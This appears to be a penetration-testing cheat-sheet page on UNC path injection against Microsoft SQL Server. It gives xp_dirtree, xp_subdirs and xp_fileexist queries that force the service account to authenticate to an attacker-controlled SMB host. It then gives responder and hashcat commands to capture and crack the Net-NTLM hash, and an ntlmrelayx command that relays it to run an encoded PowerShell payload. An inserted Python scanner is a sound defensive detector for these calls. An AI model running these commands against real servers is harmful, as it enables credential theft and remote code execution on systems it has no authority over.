# UNC Path Injection

## Overview

This attack abuses the xp\_dirtree extended stored procedure (and similar procedures such as xp\_subdirs and xp\_fileexist) to force a SQL Server instance to connect to an SMB share that the attacker controls. The server authenticates to that share with the SQL Server service account, allowing the attacker to capture the account's Net-NTLM hash, which can then be cracked offline or relayed.

## Examples

### xp\_dirtree

The following SQL query can be used:

{% code overflow="wrap" %}

```sql
EXEC master..xp_dirtree '\\192.168.119.120\test';
```

{% endcode %}

### xp\_subdirs

The following SQL query can be used:

{% code overflow="wrap" %}

```sql
EXEC master..xp_subdirs '\\192.168.119.120\test';
```

{% endcode %}

### xp\_fileexist

The following SQL query can be used:

{% code overflow="wrap" %}

```sql
EXEC master..xp_fileexist '\\192.168.119.120\test';
```

{% endcode %}
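
A defender-side check, added here as an example and not part of the original page: it scans T-SQL statements (for instance from a SQL Server audit log) for calls to the three procedures above that receive a UNC path, extracts the target host, and reports any host not on an allowlist. The statements, the allowlist entries and the hostnames are constructed samples.

```python
import re
from dataclasses import dataclass
# Extended stored procedures that take a path argument; given a UNC path they
# make the SQL Server service account authenticate to the named host over SMB.
UNC_PROCS = ("xp_dirtree", "xp_subdirs", "xp_fileexist")
# Matches "EXEC master..xp_dirtree '\\host\share'" and variants: optional
# master.. / master.dbo. prefix, optional N prefix, single- or double-quoted
# literal (doubled single quotes inside the literal are handled).
CALL = re.compile(
    r"(?:master\s*\.\s*(?:dbo)?\s*\.\s*)?(" + "|".join(UNC_PROCS) + r")"
    r"\s*\(?\s*N?(?:'((?:[^']|'')*)'|\"([^\"]*)\")",
    re.IGNORECASE,
)
# UNC prefix in either slash style, capturing the host portion.
UNC_HOST = re.compile(r"^(?:\\\\|//)([^\\/]+)")

@dataclass
class Finding:
    proc: str
    path: str
    host: str

def find_unc_calls(statement: str, allowed_hosts=()):
    """Return a Finding for every UNC path passed to one of UNC_PROCS whose
    host is not on the allowlist. Local paths never trigger outbound SMB."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for m in CALL.finditer(statement):
        proc = m.group(1).lower()
        path = m.group(2).replace("''", "'") if m.group(2) is not None else m.group(3)
        host = UNC_HOST.match(path)
        if host and host.group(1).lower() not in allowed:
            findings.append(Finding(proc, path, host.group(1).lower()))
    return findings

# Constructed sample statements, as they might appear in a SQL audit log.
SAMPLE_STATEMENTS = [
    "EXEC master..xp_dirtree '\\\\192.168.119.120\\test';",
    "EXEC master..xp_fileexist 'C:\\temp\\report.csv';",
    'exec xp_subdirs "\\\\fileserver01\\backups"',
    "SELECT name FROM sys.objects;",
]

def scan(statements, allowed_hosts=("fileserver01",)):
    return [f for s in statements for f in find_unc_calls(s, allowed_hosts)]

if __name__ == "__main__":
    for f in scan(SAMPLE_STATEMENTS):
        print(f"ALERT: {f.proc} reached out to {f.host} via {f.path}")
```

Only the call to the non-allowlisted 192.168.119.120 is reported; the local path and the allowlisted file server are ignored.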

## Capturing/Relaying the Net-NTLM hash

### Using responder to capture the Net-NTLM hash

{% code overflow="wrap" %}

```bash
# listen on the interface the SQL server will reach the share through
sudo responder -I tap0

# hashcat command to crack the captured hash (mode 5600 = NetNTLMv2)
hashcat -m 5600 hash.txt dict.txt --force
```

{% endcode %}

### Relaying the Net-NTLM hash

{% hint style="info" %}
SMB signing must be disabled (not required) on the relay target for this attack to work.
{% endhint %}

{% code overflow="wrap" %}

```bash
sudo impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.120.6 -c 'powershell -enc <base64 encoded payload>'
```

{% endcode %}
